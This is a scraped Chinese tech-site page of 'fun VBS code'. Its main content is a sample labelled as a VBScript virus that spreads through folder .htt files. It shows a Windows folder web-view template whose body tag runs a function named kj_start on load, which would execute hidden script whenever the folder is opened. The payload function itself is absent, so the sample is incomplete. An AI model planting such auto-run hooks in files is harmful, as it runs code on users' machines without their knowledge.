当前位置: 移动技术网 > IT编程>脚本编程>VBScript > 好玩的vbs特色代码第1/6页

好玩的vbs特色代码第1/6页

2017年12月12日  | 移动技术网IT编程  | 我要评论
用什么来表示组合?比如从5个数里面选n个数,你怎么用一个数字来表述你的选择结果?注意是一个数字。 硬盘的权限就是一个例子,参考脚本手册filesystem文件attribu

一种简单的利用htt文件传播的vbs脚本病毒

<body  onload="vbscript:kj_start()">  
<!--  
  *  copyright  1999  microsoft  corporation.    all  rights  reserved.  
  -->  
<html>  
        <head>
                <meta  http-equiv="content-type"  content="text/html;  charset=utf-8">  
        </head>  
        <style>  
                body                {margin:  0;  font:  menu;  color:  black}  

                #panel            {position:  absolute;  width:  200px;  height:  100%;  visibility:  hidden;  overflow:  auto}  

                #corner          {padding-left:  12px;  padding-top:  11px}  

                #foldericon  {width:  32px;  height:  32px}  

                #foldername  {margin-top:  8px;  font:  14pt/14pt  menu;  font-weight:  bold}  

                #logoline      {width:  100%;  height:  2px;  margin-top:  4px;  vertical-align:  top}  

                #details        {padding-left:  12px;  margin-top:  8px}  

                #locked          {vertical-align:  baseline}  

                .divider        {width:  100%;  color:  #c0c0c0;  height:  1px}  

                #thumbnail    {width:  120px;  height:  120px}  

                .legend          {margin-left:  8px}  

                #brand            {position:  absolute;  left:  200px;  width:  100%;  height:  100%;  padding-left:  12px}  

                p                      {margin-top:  12px}  

                p.half            {margin-top:  4px}  

                button            {font:  9pt  宋体,  ms  song;  margin-left:  12px;  background:  white;  color:  black}  

                .message        {width:  100%;  frameborder:  0;  background:  infobackground;  color:  infotext;  border:  1px  solid  lightgrey}  

                #cscplusmin  {width:  17px}  

                #csctext        {}  

                #cscdetail    {}  


                #cscbutton    {}                  #filelist      {position:absolute;  width:0;  height:100%;  border=0}  

        </style>  

        <body  scroll=no>  

                <div  id=panel  style="background:  white  url(wvleft.bmp)  no-repeat">  

                        <div  id=corner>  

                                <object  id=foldericon  classid="clsid:844f4806-e8a8-11d2-9652-00c04fc30871"  tabindex=-1>  

                                        <param  name="scale"  value=100>  

                                </object>  

                                <br/>  

                                <div  id=foldername>  

                                        %thisdirname%  

                                </div>  

                        </div>  

                        <img  id=logoline  src="wvline.gif">  

                        <div  id=details>  

                                <span  id=csc>  

                                        <div  tabindex=2  id=cschottrack>  

                                        <span  id=cscplusmin>  

                                        </span>  

                                        <span  id=csctext>  

                                        </span>  

                                        </div>  

                                        <div  id=cscdetail>  

                                        </div>  

                                        <span  id=cscbutton>  

                                        </span>  

                                        <hr  class=divider  noshade>  

                                </span>  

                                <span  id=info>  

                                </span>  

  

                                <br/>  

                                <span  id=mediaplayerspan>  

                                </span>  

  

                                <object  id=thumbnail  classid="clsid:71650000-e8a8-11d2-9652-00c04fc30871"  tabindex=-1>  

                                </object>  

                                <label  id=thumbnaillabel  for="thumbnail"  style="display:  none">  

                                </label>  

  

                                <span  id=links>  

                                </span>  

                        </div>  

                </div>  

                <object  id=filelist  classid="clsid:1820fed0-473e-11d0-a96c-00c04fd705a2"  tabindex=1>  

                </object>  

                <object  id=wvcoord  classid="clsid:bcfd624e-705a-11d2-a2af-00c04fc30871">  

                </object>  

        </body>  

</html>
5

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

验证码:
移动技术网